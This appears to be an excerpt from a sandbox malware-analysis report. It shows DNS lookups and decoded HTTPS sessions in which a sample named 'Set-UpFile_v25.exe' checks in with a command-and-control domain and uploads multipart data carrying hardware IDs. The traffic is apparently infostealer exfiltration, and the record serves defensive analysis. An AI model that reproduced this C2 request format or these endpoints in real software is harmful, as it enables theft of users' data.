                                                                                                                                                              Jan 7, 2025 14:37:25.576744080 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.047687054 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.047768116 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.049245119 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.049251080 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.049484015 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.051048994 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.051904917 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.051933050 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.052347898 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.052373886 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.052474022 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.052489042 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053055048 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053071022 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053195953 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053217888 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053375959 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053392887 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.053402901 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053520918 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.053541899 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.062611103 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.062872887 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.062891006 CET44349756104.21.25.52192.168.2.4
                                                                                                                                                              Jan 7, 2025 14:37:26.062907934 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.062963963 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.063002110 CET49756443192.168.2.4104.21.25.52
                                                                                                                                                              Jan 7, 2025 14:37:26.063158035 CET44349756104.21.25.52192.168.2.4
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 14:37:11.142642021 CET | 192.168.2.4 | 1.1.1.1 | 0x611 | Standard query (0) | beattalkerz.cyou | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:37:28.644005060 CET | 192.168.2.4 | 1.1.1.1 | 0xd62a | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:37:29.705832005 CET | 192.168.2.4 | 1.1.1.1 | 0xc8b6 | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:37:30.804349899 CET | 192.168.2.4 | 1.1.1.1 | 0x7106 | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 14:37:11.162782907 CET | 1.1.1.1 | 192.168.2.4 | 0x611 | No error (0) | beattalkerz.cyou | | 104.21.25.52 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:37:11.162782907 CET | 1.1.1.1 | 192.168.2.4 | 0x611 | No error (0) | beattalkerz.cyou | | 172.67.222.183 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:37:28.750129938 CET | 1.1.1.1 | 192.168.2.4 | 0xd62a | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:37:29.715138912 CET | 1.1.1.1 | 192.168.2.4 | 0xc8b6 | Name error (3) | klipvumisui.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:37:30.818614006 CET | 1.1.1.1 | 192.168.2.4 | 0x7106 | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false
• beattalkerz.cyou
• cegu.shop
Session ID: 0
Source IP: 192.168.2.4
Source Port: 49748
Destination IP: 104.21.25.52
Destination Port: 443
PID: 7272
Process: C:\Users\user\Desktop\Set-UpFile_v25.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:11 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: beattalkerz.cyou
2025-01-07 13:37:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-07 13:37:12 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=s6uksiqju9rtuumh4hiuk4dr19; expires=Sat, 03 May 2025 07:23:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iToJptAAeGYa0tDCCR4EurRsl8PZ0MIZQPj9bqfNLjD09OEjMxxgm%2F1F%2Fla0rlJJfGlH54kEVeiw1eW%2B%2FXc7GNRjOJDbB64RXO1AsKHo1QKBfh9pikLmdIZwwzwPhqAKr4MH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe45750993b7c99-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1940&rtt_var=746&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1449131&cwnd=235&unsent_bytes=0&cid=fd93a1480967260c&ts=496&x=0"
2025-01-07 13:37:12 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-07 13:37:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49749
Destination IP: 104.21.25.52
Destination Port: 443
PID: 7272
Process: C:\Users\user\Desktop\Set-UpFile_v25.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:12 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 78
Host: beattalkerz.cyou
2025-01-07 13:37:12 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397
2025-01-07 13:37:13 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8ovmel7fhkvpeptii6ae6ae8ea; expires=Sat, 03 May 2025 07:23:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YDUy2gI5cad%2FEcciy2UwWNzBuzuchQTm5mkOEYn43p%2FBYscYtYZqzx7DiCo9Oi9ehV8t7Q3hZaM3fzqiry8oko6tlOHnhKZ%2FxJPLfxhozV%2Fk5RP1uZAhYJAG7daQcZpvmLux"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe4575668750f49-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1581&rtt_var=883&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=978&delivery_rate=1846932&cwnd=215&unsent_bytes=0&cid=0debd7473ca6caa9&ts=458&x=0"
                                                                                                                                                              Data Ascii: XpcDQSCPvtnfVIpradO2mhf/nCJVTSDVGas8bZsPL9AGs1c9XDO+2P8Jlgp527ODRte8dn1BSfA8kxwA0mobeA7DI3V0h5LZ53C6R0nblq4b5pkHbWlg1UGrmCDWMiNsaodyZRWP7+XjRa8OecuurjfXqD59QQGcHLc8KLYmB0ha8z9JVK/C1cc8uicwxruCO7aZX22tHZRgpijIwmJ3eHLuHxhQ0or5znXPb2H7po4b07wOWWElwCSzMCSybjd
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 77 42 6f 71 37 76 6b 6e 6e 53 69 63 33 58 44 71 71 59 58 36 34 51 75 4a 56 30 64 6e 43 53 76 44 44 69 71 62 68 74 67 62 74 73 37 55 56 69 44 6c 76 6e 44 59 61 39 57 65 64 76 6a 67 30 62 58 48 41 70 42 52 47 79 39 49 4e 59 59 61 5a 70 79 48 6c 55 6e 33 78 39 4e 66 4a 2b 2b 36 63 4e 34 35 6d 74 68 6a 34 4b 32 44 35 2b 77 45 6e 6c 42 4e 65 41 73 73 7a 67 67 71 69 59 4c 56 45 72 79 48 6c 78 6f 71 2b 76 6b 6e 6e 51 69 4d 79 48 76 6e 72 4a 2f 2b 35 77 79 4e 55 46 41 31 52 6d 72 5a 42 44 66 62 30 38 4d 42 6f 4d 44 47 46 44 53 69 76 6e 4f 64 63 39 76 59 65 4f 61 6e 6a 2f 76 30 43 70 31 53 54 33 77 42 4c 73 41 41 4a 70 2b 50 30 68 53 30 79 39 4a 64 4c 75 32 39 64 74 4d 69 6c 4a 34 2f 6f 4b 65 52 74 62 35 50 75 6b 5a 44 65 51 56 71 31 30 30 2f 32 34 7a 5a 55 65 2b
                                                                                                                                                              Data Ascii: wBoq7vknnSic3XDqqYX64QuJV0dnCSvDDiqbhtgbts7UViDlvnDYa9Wedvjg0bXHApBRGy9INYYaZpyHlUn3x9NfJ++6cN45mthj4K2D5+wEnlBNeAsszggqiYLVEryHlxoq+vknnQiMyHvnrJ/+5wyNUFA1RmrZBDfb08MBoMDGFDSivnOdc9vYeOanj/v0Cp1ST3wBLsAAJp+P0hS0y9JdLu29dtMilJ4/oKeRtb5PukZDeQVq100/24zZUe+
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 63 4b 79 61 64 67 73 6a 5a 78 45 34 36 36 48 38 76 42 50 68 47 49 4f 4e 51 6c 71 6b 44 6f 2f 32 35 32 56 53 65 57 4a 6d 55 68 74 75 76 6b 34 33 6a 6d 4a 32 48 4c 32 6f 38 37 4c 32 43 69 4e 56 30 64 6c 44 7a 33 48 51 32 6a 62 68 4a 56 4a 6a 6f 66 51 58 54 62 7a 72 33 4c 4e 4c 4e 76 68 50 36 43 34 79 61 32 6d 4f 70 68 54 54 6e 49 65 4f 34 55 6b 4d 4a 47 4d 78 52 61 67 79 4a 6b 55 62 65 54 35 4a 34 35 6c 32 39 70 67 6f 50 6a 5a 70 37 31 61 79 41 6f 51 4a 78 64 6b 30 55 4d 77 32 39 4f 48 58 2f 66 56 6d 51 4a 74 70 62 70 74 7a 79 32 59 79 48 4b 6e 6e 72 66 53 2f 41 4b 64 53 6c 46 4c 4e 69 33 53 44 69 43 4d 6d 70 6b 45 74 4d 6e 58 58 54 75 69 39 7a 2f 53 61 38 50 6e 4d 61 6a 67 74 72 75 6d 46 39 73 46 41 45 41 4c 4a 4d 59 45 4d 49 72 47 38 67 75 36 77 63 35 4c
                                                                                                                                                              Data Ascii: cKyadgsjZxE466H8vBPhGIONQlqkDo/252VSeWJmUhtuvk43jmJ2HL2o87L2CiNV0dlDz3HQ2jbhJVJjofQXTbzr3LNLNvhP6C4ya2mOphTTnIeO4UkMJGMxRagyJkUbeT5J45l29pgoPjZp71ayAoQJxdk0UMw29OHX/fVmQJtpbptzy2YyHKnnrfS/AKdSlFLNi3SDiCMmpkEtMnXXTui9z/Sa8PnMajgtrumF9sFAEALJMYEMIrG8gu6wc5L
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 2b 61 4b 49 6e 4d 64 2b 4f 32 69 72 4c 59 4d 62 78 54 52 33 51 65 4f 74 38 4d 47 4b 57 65 31 68 2b 35 77 4d 39 4c 62 61 7a 35 63 4a 31 7a 6f 70 34 35 6f 4a 2f 48 74 66 35 50 77 78 31 31 64 67 59 6b 7a 78 55 33 31 71 7a 62 46 72 62 52 79 55 30 69 6f 76 63 2f 32 32 76 44 6a 44 2b 67 70 4a 69 31 76 6c 2f 4a 42 68 55 6d 58 33 71 61 48 47 69 43 79 38 4e 52 37 35 57 58 47 6a 2b 69 34 54 2b 61 4b 49 6e 4d 64 2b 4f 32 69 72 4c 59 4d 62 78 54 52 33 51 65 4f 74 38 4d 61 62 57 39 39 43 2b 4a 30 74 70 55 49 2b 57 76 62 70 31 6c 32 39 45 78 75 4a 6e 4a 76 61 59 77 31 52 31 59 4e 56 42 71 2f 51 41 6f 6c 59 7a 44 41 50 72 67 31 31 30 73 39 4b 6c 6f 30 6d 53 31 36 46 43 67 37 73 6e 7a 70 6c 66 4a 45 77 42 78 47 57 71 51 55 33 54 41 33 6f 5a 47 35 35 58 47 46 44 53 69 72
                                                                                                                                                              Data Ascii: +aKInMd+O2irLYMbxTR3QeOt8MGKWe1h+5wM9Lbaz5cJ1zop45oJ/Htf5Pwx11dgYkzxU31qzbFrbRyU0iovc/22vDjD+gpJi1vl/JBhUmX3qaHGiCy8NR75WXGj+i4T+aKInMd+O2irLYMbxTR3QeOt8MabW99C+J0tpUI+Wvbp1l29ExuJnJvaYw1R1YNVBq/QAolYzDAPrg110s9Klo0mS16FCg7snzplfJEwBxGWqQU3TA3oZG55XGFDSir
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 32 7a 48 62 77 6f 38 6d 37 70 67 50 62 42 51 42 34 47 69 33 59 41 47 71 63 6b 64 4a 52 71 49 6e 41 47 6a 75 69 34 53 79 54 61 34 6d 65 4b 61 44 6e 68 2f 6a 6e 44 4a 56 65 55 6d 63 4f 4b 64 34 41 59 61 57 31 2b 41 4f 77 31 39 6f 59 48 4f 2b 39 61 63 67 6f 69 39 6c 50 33 6f 32 62 38 76 59 4d 32 58 46 48 65 41 51 55 39 6a 51 33 6e 4a 75 58 4e 37 54 52 32 68 70 6a 6f 71 45 2f 68 57 75 32 7a 48 62 77 6f 38 76 5a 34 51 4b 58 48 56 38 37 45 57 72 65 51 33 37 49 78 5a 55 44 39 35 2b 5a 48 53 37 77 71 33 6e 65 50 5a 69 5a 54 39 36 4e 6d 2f 4c 32 44 4e 6c 73 54 58 45 65 50 38 73 54 49 61 57 31 2b 41 4f 77 31 39 6f 59 43 4e 6a 37 54 73 73 6f 6d 39 42 32 6f 4f 37 4a 37 61 5a 58 32 33 42 53 63 68 67 70 69 69 59 63 32 62 72 44 45 72 66 4a 33 68 70 6a 6f 72 55 2f 68 57
                                                                                                                                                              Data Ascii: 2zHbwo8m7pgPbBQB4Gi3YAGqckdJRqInAGjui4SyTa4meKaDnh/jnDJVeUmcOKd4AYaW1+AOw19oYHO+9acgoi9lP3o2b8vYM2XFHeAQU9jQ3nJuXN7TR2hpjoqE/hWu2zHbwo8vZ4QKXHV87EWreQ37IxZUD95+ZHS7wq3nePZiZT96Nm/L2DNlsTXEeP8sTIaW1+AOw19oYCNj7Tssom9B2oO7J7aZX23BSchgpiiYc2brDErfJ3hpjorU/hW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49750 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:13 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GEC2K66UIK1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18120
Host: beattalkerz.cyou
2025-01-07 13:37:13 UTC | 15331 | OUT | Data Ascii:
--GEC2K66UIK1
Content-Disposition: form-data; name="hwid"

C771F00350FD017B33642DA608956FF1
--GEC2K66UIK1
Content-Disposition: form-data; name="pid"

2
--GEC2K66UIK1
Content-Disposition: form-data; name="lid"

hRjzG3--ZINA
--GEC2K66UIK1
Conte
2025-01-07 13:37:13 UTC | 2789 | OUT | Data Raw: (binary, non-printable)
2025-01-07 13:37:14 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gn6tbn84j14igjqi6t13q672i4; expires=Sat, 03 May 2025 07:23:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=anuwvDI67Q4k88LKAkHxRZjnd1jftBFcSBiNrqPLM9GlBwOwjlKzfeiE5FyCRPZA1%2BR5%2BlqU87BzOchb0NS6J%2BxzYel2kEM%2F56gg7Qx2XNZ6h%2FPBsKYJ1ehhPYMk6hK9KGRZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe4575e4e0cf795-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1498&rtt_var=562&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19075&delivery_rate=1946666&cwnd=187&unsent_bytes=0&cid=16a3eefb1a737626&ts=611&x=0"
2025-01-07 13:37:14 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2025-01-07 13:37:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49751 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:15 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0J1ENAKYSQRTU5UCL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8777
Host: beattalkerz.cyou
2025-01-07 13:37:15 UTC | 8777 | OUT | Data Ascii:
--0J1ENAKYSQRTU5UCL
Content-Disposition: form-data; name="hwid"

C771F00350FD017B33642DA608956FF1
--0J1ENAKYSQRTU5UCL
Content-Disposition: form-data; name="pid"

2
--0J1ENAKYSQRTU5UCL
Content-Disposition: form-data; name="lid"

hRjzG3--ZINA
--
2025-01-07 13:37:15 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3l6q91cm9fkagubm7ok9qosgdv; expires=Sat, 03 May 2025 07:23:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xM1SSYFDW3Lzji8GcyhREISAhS6n7PzUeO0aEaarRY1i6l8FiBE2y8jafR%2F%2BgFByjWnTnl7eNrC9ke06n1DXoTiHiBQWfJ38fPC6MwkTsDwe%2FQFSunS%2Bh4qd2Ma6xyVmzSa"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe457660c8f8cb7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2001&rtt_var=757&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9715&delivery_rate=1439132&cwnd=168&unsent_bytes=0&cid=5276a566c32babf3&ts=483&x=0"
2025-01-07 13:37:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2025-01-07 13:37:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49752 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:16 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=B7GDPGPLHYU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20394
Host: beattalkerz.cyou
2025-01-07 13:37:16 UTC | 15331 | OUT | Data Ascii:
--B7GDPGPLHYU
Content-Disposition: form-data; name="hwid"

C771F00350FD017B33642DA608956FF1
--B7GDPGPLHYU
Content-Disposition: form-data; name="pid"

3
--B7GDPGPLHYU
Content-Disposition: form-data; name="lid"

hRjzG3--ZINA
--B7GDPGPLHYU
Conte
2025-01-07 13:37:16 UTC | 5063 | OUT | Data Raw: (binary, non-printable)
2025-01-07 13:37:21 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ijfodfcc5ian98c0s145t7ib7f; expires=Sat, 03 May 2025 07:23:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMYPChR5HnKXeE5MRGqYpFNsN0d1nBwtr5su0UdtTB11EzdDUTQ3r7E5QewPzMB3HGgvexbBKJlIjfvgQgL8qc30MwdlYFuHY4%2BxTlhNTHr0EZ0qbxprDLrgH556V%2FyAkfrt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe4576dd93a80e0-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1528&rtt_var=585&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21349&delivery_rate=1910994&cwnd=202&unsent_bytes=0&cid=43ca3ba7aed26fd2&ts=5400&x=0"
                                                                                                                                                              2025-01-07 13:37:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2025-01-07 13:37:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49754 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:22 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=8Z8YAVH559VDX1P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 7111
Host: beattalkerz.cyou
2025-01-07 13:37:22 UTC | 7111 | OUT | Data Raw: 2d 2d 38 5a 38 59 41 56 48 35 35 39 56 44 58 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 38 5a 38 59 41 56 48 35 35 39 56 44 58 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 5a 38 59 41 56 48 35 35 39 56 44 58 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 38 5a 38 59 41 56
Data Ascii: --8Z8YAVH559VDX1PContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--8Z8YAVH559VDX1PContent-Disposition: form-data; name="pid"1--8Z8YAVH559VDX1PContent-Disposition: form-data; name="lid"hRjzG3--ZINA--8Z8YAV
2025-01-07 13:37:23 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=f2qagcki02g497gdudu3u2gpq0; expires=Sat, 03 May 2025 07:24:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QmW0IVzXdgvWHXN%2FGa3d2KvRnHyYLVZjY5QMQ%2ByprCzSZIWkss%2FvRh%2BoQQLJrbmn6YAj3jT%2BpuHV4qjleHVBfuRQEDXz9rcVH8dTx9LPa%2B0WsAVhSg0ghm7g5iqeT%2BXo0p9Y"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe45795bba21899-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1520&rtt_var=590&sent=5&recv=12&lost=0&retrans=0&sent_bytes=2840&recv_bytes=8025&delivery_rate=1823860&cwnd=153&unsent_bytes=0&cid=90b8a533f158c954&ts=783&x=0"
2025-01-07 13:37:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 13:37:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe
Timestamp | Bytes transferred | Direction | Data
